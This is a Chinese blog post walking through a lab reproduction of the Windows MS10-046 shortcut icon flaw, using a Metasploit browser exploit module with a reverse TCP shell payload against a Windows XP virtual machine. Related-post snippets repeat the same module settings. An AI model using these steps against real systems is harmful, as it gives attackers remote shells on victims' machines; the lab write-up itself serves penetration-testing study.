MS10_046_shortcut_icon_dllloader漏洞复现

最新推荐文章于 2023-07-29 23:23:36 发布
最新推荐文章于 2023-07-29 23:23:36 发布
阅读量5.3k 收藏 4
点赞数
分类专栏: 渗透测试 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48907714/article/details/123427352
版权

MS10_046漏洞复现

漏洞介绍:Windows Shell 中一个公开披露的漏洞。 如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。

00x01实验环境

两台虚拟机,一台为kali ip:192.168.72.4
一台为 Windows xp ip:192.168.72.6
使用的工具:msfconsole

00x02实验过程

  1. 打开两台虚拟机,打开kali的msf软件,搜索MS10_046漏洞,找到三个模块
    在这里插入图片描述

  2. 本次复现第二个模块use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    在这里插入图片描述

  3. show options 显示选项
    在这里插入图片描述

  4. 服务器地址SRVHOST–>192.168.72.4
    payload->windows/shell/reverse_tcp
    回连端口LPORT–>7777
    在这里插入图片描述

  5. run执行,得到url
    在这里插入图片描述

  6. 在xp当中用IE访问192.168.72.4\olhYgBN\进入文件
    在这里插入图片描述

  7. 并且kai接收到回显,表示连接成功
    在这里插入图片描述

  8. 查看会话列表
    在这里插入图片描述

  9. 利用会话1
    在这里插入图片描述

  10. 获得权限
    在这里插入图片描述

百密不疏
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超级终端_中文_Unicode.rar
02-01
how install hyper terminal into Win10 1. got: hypertrm.dll hticons.dll hypertrm.chm hypertrm.exe hypertrm.hlp from windows XP dir:C:\Windows\System32 2.put hypertrm.dll hticons.dll into...
ms10_046_shortcut_icon_dllloader漏洞利用和ettercap dns欺骗
weixin_30755393的博客
12-03 301
ms10_046_shortcut_icon_dllloader漏洞利用过程 msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reve...
ms10_046_shortcut_icon_dllloader 这个其实很好用
爱杀之爪的矩阵
04-08 3739
“韩国以太坊”ICON爆代码漏洞,所有交易暂停
硅谷密探
06-19 561
硅谷Live / 实地探访 / 热点探秘 / 深度探讨韩国国家级区块链项目ICON(ICX)智能合约代码近日被爆代码存在安全漏洞,使transfer功能失效。虽然黑客无法...
漏洞复现---MS10-046漏洞
liu914589417的博客
04-27 5078
漏洞复现MS10-046漏洞 实验工具 1、VMware虚拟机 2、Windows7系统虚拟机 3、Kali 2021 系统虚拟机 1、在VMware中打开Windows7虚拟机和Kali 2021虚拟机,并确保两台机器处于同一网段,能互相ping通。 2、确定IP 地址和网络连接正常后,Kali 2021中输入命令【msfconsole】进入MSF攻击框架。 3、进入MSF攻击框架后,搜索MS10-046漏洞,输入命令【search ms10_046】,回车执行命令,搜索到下列漏洞。 4、引用编号
操作系统攻击:早期WindowsMS10-046漏洞
shelter1234567的博客
07-29 998
本次介绍早期的windows高危漏洞——MS10_046_SHORTCUT_ICON_DLLLOADER ,该漏洞可以通过浏览器跳转网络资源的方式利用,结合xss攻击用户的系统 危险性极高。
禁用Ctrl+Alt+Del源码 .rar_ctrl alt del_shortcut_system
09-14
The code shows how to disable Ctrl+Alt+Del shortcut in windows system.
api.rar_Free space_taskbarapi
09-24
如何用VB建立快捷方式(ShortCut) 如何直接开启一个文件 设定Mouse 在某个固定范围 隐藏Mouse 显示、隐藏win95任务栏 建立Floating Window(Top Most的window) 建立与读取.ini文件 检查开机方式及Mouse Buttons...
fvwm.tar.gz_The Bind_fvwm
09-19
my fvwm config, it is very simple, everything is bind to keyboard shortcut, the UI is the most simple one, the the CLI softwares were recommended.
tje.rar_The Program
09-14
Set the shortcut for the entire program
ms10-046漏洞利用+bypassuac提权
m0_62008601的博客
11-24 1055
记一次ms10-046漏洞复现过程+bypassuac提权过程
Metasploit-MS10-046Web反弹连接复现
5L2g556F5ZWl77yf
09-08 488
一. 概述 Windows Shell 中的漏洞可能允许远程执行代码 (2286198) 发布时间: 2010年8月2日 | 更新时间: 2010年8月24日 版本: 1.2 详情请查阅下方微软官方文档 概览 中文名:无 微软官方编号:MS10-046 CVE编号:无 类型:远程代码执行 官方评级:严重 影响系统:winxp,win7,winserver03,winserver08r2 二. 复现 攻击机 靶机 IP:192.168.3.70 192
MS10-046文件快捷方式漏洞复现与利用
sGanYu
11-07 4828
攻击机:kali 靶机:windows xp sp2 使用metasploit框架,需要启用metasploit所依赖的postgresql数据库 在kali上启动postgresql命令【systemctl start postgresql】 如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开 启动msfconsole 搜索ms10-046相应的模块 这里有两个可利用的模块,browser.
Metasploit Framework渗透测试框架基础入门到进阶实战
02-15
一、课程概要      本课程主要分享Metasploit Framework渗透测试框架基础入门到进阶实战教程!二、适合人员      1、零基础大学生      2、IT技术人员      3、运维工程师      4、渗透测试工程师三、特别说明      1、本课程支持一次购买,永久观看!      2、本课程支持一次购买,永久更新!      
Kali Linux学习篇:Metasploit渗透测试框架入门到实战
07-24
1、课程概要     本课程主要分享Kali Linux渗透测试之Metasploit Framework渗透测试框架入门学习到进阶实战全程课!2、课程目标      本课程致力于帮助广大学员掌握Metasploit渗透测试框架入门到进阶技术!
Kali Linux渗透测试基础入门到进阶实战全程课
09-29
课程标题:Kali Linux渗透测试基础入门到进阶实战全程课一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要       本课程主要分享Kali Linux渗透测试基础入门到进阶实战全程技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
MS10_046漏洞利用
彼岸花苏陌的博客
12-04 576
如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 ...
使用ms10_046对xp系统进行渗透
xiaopan233的博客
09-22 2345
本实验在虚拟机环境下进行!!! 准备: Kali 192.168.88.105 Xp  192.168.88.106  这个是一个图标漏洞,所以我们只需要设置好参数,等待靶机访问即可 进入msfconsole search  ms10_046 查找相应的模块 这里可以看到,有两个可用于攻击的模块,但一个是browser一个是smb,我们先试试browser的行不行 使用模块 ...
EXTRA_SHORTCUT_ICON_RESOURCE
最新发布
04-11
EXTRA_SHORTCUT_ICON_RESOURCE是Android中的一个常量,用于指定应用程序快捷方式的图标资源。当创建应用程序快捷方式时,可以使用该常量来指定快捷方式的图标。 使用EXTRA_SHORTCUT_ICON_RESOURCE时,需要传递一个资源标识符(Resource Identifier),该标识符指向应用程序中的一个图标资源。通过指定图标资源,可以确保快捷方式在桌面上显示的图标与应用程序的图标一致。 以下是使用EXTRA_SHORTCUT_ICON_RESOURCE创建应用程序快捷方式的示例代码: ```java Intent shortcutIntent = new Intent(getApplicationContext(), MainActivity.class); shortcutIntent.setAction(Intent.ACTION_MAIN); Intent addIntent = new Intent(); addIntent.putExtra(Intent.EXTRA_SHORTCUT_INTENT, shortcutIntent); addIntent.putExtra(Intent.EXTRA_SHORTCUT_NAME, "My App Shortcut"); // 设置快捷方式的图标资源 addIntent.putExtra(Intent.EXTRA_SHORTCUT_ICON_RESOURCE, Intent.ShortcutIconResource.fromContext(getApplicationContext(), R.drawable.app_icon)); addIntent.setAction("com.android.launcher.action.INSTALL_SHORTCUT"); getApplicationContext().sendBroadcast(addIntent); ``` 在上述示例中,我们创建了一个Intent对象addIntent,并通过putExtra方法设置了快捷方式的相关属性,包括快捷方式的名称、启动Intent、以及图标资源。其中,EXTRA_SHORTCUT_ICON_RESOURCE使用了fromContext方法来获取图标资源的标识符。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值